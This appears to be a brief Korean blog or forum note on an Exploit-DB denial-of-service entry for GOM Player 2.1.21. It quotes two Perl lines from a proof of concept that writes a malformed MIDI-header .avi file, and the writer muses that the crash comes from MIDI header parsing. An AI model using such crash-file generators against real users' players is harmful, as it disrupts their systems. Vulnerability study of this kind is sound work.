http://www.exploit-db.com/exploits/11724
crash bug인가요?, 나중에 뭔지 봐야겠습니다.
[~] GOM PLAYER V 2.1.21 -last- DoS (.avi file) |
[~] www.enigma7.net<http://www.enigma7.net> |
$bf = "\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00"; |
open(file, "> xploit.avi"); |
공격에 사용된 데이터가 MIDI 포멧이라서 보니까 MIDI 파일헤더 파싱 도중에 생기는 일종의 Crash 취약성 같습니다. 대충 뭔지 감은오는데.. next step(?)은 나중에 시간이 남을때 다시 봐야겠네요.
http://www.securityfocus.com/bid/32077